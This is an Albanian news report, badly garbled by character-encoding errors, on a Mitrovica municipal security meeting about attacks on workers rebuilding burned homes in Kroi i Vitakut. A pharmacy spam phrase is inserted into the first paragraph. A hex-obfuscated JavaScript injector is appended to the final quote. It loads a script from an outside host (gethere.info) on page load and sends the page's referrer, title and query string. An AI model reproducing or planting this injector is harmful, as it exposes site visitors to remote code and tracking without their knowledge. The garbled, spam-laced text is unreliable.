Foto_nga_ceremonia_e_gurthemelit_621611

Nuk ndalet rindA�rtimi nA� veri

prescription drugs new zealand. PA�rkundA�r kA�rcA�nimeve dhe incidenteve qA� janA� duke krijuar strukturat paralele serbe nA� veri, rindA�rtimi i shtA�pive tA� djegura dhe tA� shkatA�rruara nA� luftA� nuk do tA� ndA�rpritet. KA�shtu tha tA� mA�rkurA�n, kryetari i KomunA�s sA� MitrovicA�s, Avni Kastrati, nA� njA� takim tA� jashtA�zakonshA�m tA� Komitetit tA� SigurisA�, tA� thirrur pas incidenteve tA� fundit nA� Kroin e Vitakut.

Kastrati theksoi se shtA�pitA� po rindA�rtohen pA�r ata qA� kanA� jetuar dhe kanA� pronat nA� veri dhe jo pA�r tA� tjerA�t.

a�?ShumA� qytetarA� tA� veriut jetojnA� nA�pA�r strehimore kolektive nA� jug, andaj ne kemi pA�r obligim ta��u ndihmojmA� qA� tA� kthehen nA� shtA�pitA� e tyrea�?, tha kreu i KomunA�s.

Ai tha se strukturat paralele serbe janA� duke tentuar qA� me A�do kusht ta ndA�rprejnA� kA�tA� proces, duke mos kursyer mjetet.

a�?TA� martA�n ka qenA� njA� situatA� e tensionuar, e cila ka mundur tA� eskalojA�, pas sulmit tA� njA� grupi serbA�sh ndaj punA�torA�ve shqiptarA�, me A�a�?rast ka mbetur i lA�nduar nga gurA�t pA�rfaqA�suesi i shqiptarA�ve tA� Kroit tA� Vitakut, Nazmi Ismajlia�?.

Kastrati, potencoi se tensionimit tA� situatA�s janA� duke i kontribuuar persona qA� nA� emA�r tA� UNMIK-ut nA� veri kA�rkojnA� leje pA�r rindA�rtim tA� shtA�pive. a�?Kjo A�shtA� absurditet, meqA� askund nA� botA� nuk kA�rkohet leje pA�r rindA�rtim tA� shtA�pisA� sA� djegura�?.

NdA�rsa, nA�nkryetari i komunA�s, Riza Haziri, tha se tA� martA�n pas sulmit me gurA� tA� njA� grupi serbA�sh ndaj punA�torA�ve shqiptarA�, ka pasur edhe tA� shtA�na armA�sh.

a�?Ka qenA� njA� situatA� tepA�r e rrezikshme. Sot puna ka rifilluar nA� veri, por situata mbetet e tensionuar, pasi qA� nA� orA�t e mA�ngjesit A�shtA� dA�gjuar njA� shpA�rthim nA� Kroin e Vitakuta�?.
Ai kA�rkoi shtim tA� masave tA� sigurisA� nga strukturat e sigurisA�, meqA� situata mund tA� eskalojA� nA� A�do moment.

NdA�rsa, drejtori pA�r Mbrojtje dhe ShpA�tim, Behxhet Bala, tha se ditA�ve tA� fundit incidentet nA� veri janA� shpeshtuar tepA�r, andaj strukturat e sigurisA� duhet tA� jenA� shumA� tA� vendosura qA� tA� parandalojnA� problemet.

Avni Zabeli nga Policia e KosovA�s, tha se janA� tA� angazhuar qA� tA� ofrojnA� siguri pA�r tA� gjithA�. a�?Jemi tA� fokusuar nA� lagjet me popullatA� tA� pA�rziera�? , tha Zabeli.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}